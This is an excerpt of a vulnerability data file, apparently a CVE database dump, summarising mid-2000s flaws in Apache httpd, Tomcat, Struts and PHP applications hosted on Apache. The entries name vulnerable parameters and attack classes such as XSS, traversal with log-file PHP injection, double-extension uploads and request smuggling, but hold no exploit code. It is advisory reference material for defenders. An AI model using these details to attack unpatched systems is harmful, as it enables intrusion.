14145| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
14146| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
14147| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
14148| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
14149| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
14150| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
14151| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
14152| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
14153| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
14154| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
14155| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
14156| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
14157| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
14158| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
14159| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
14160| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
14161| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
14162| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
14163| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
14164| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
14165| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
14166| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
14167| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
14168| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
14169| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
14170| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
14171| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
14172| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
14173| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
14174| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
14175| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
14176| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
14177| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
14178| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
14179| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
14180| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
14181| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
14182| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
14183| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
14184| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
14185| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
14186| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
14187| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
14188| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
14189| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
14190| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
14191| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
14192| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
14193| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
14194| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
14195| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
14196| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
14197| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
14198| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
14199| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
14200| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
14201| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
14202| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
14203| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
14204| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
14205| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
14206| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
14207| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
14208| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
14209| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
14210| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
14211| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
14212| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
14213| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
14214| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
14215| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
14216| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
14217| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
14218| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
14219| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
14220| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
14221| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
14222| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
14223| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
14224| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
14225| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
14226| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
14227| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
14228| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
14229| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
14230| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
14231| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
14232| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
14233| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
14234| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
14235| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
14236| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
14237| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
14238| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
14239| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
14240| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
14241| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
14242| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
14243| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
14244| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
14245| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
14246| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
14247| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
14248| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
14249| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
14250| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
14251| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
14252| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
14253| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
14254| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
14255| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
14256| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
14257| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
14258| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
14259| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
14260| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
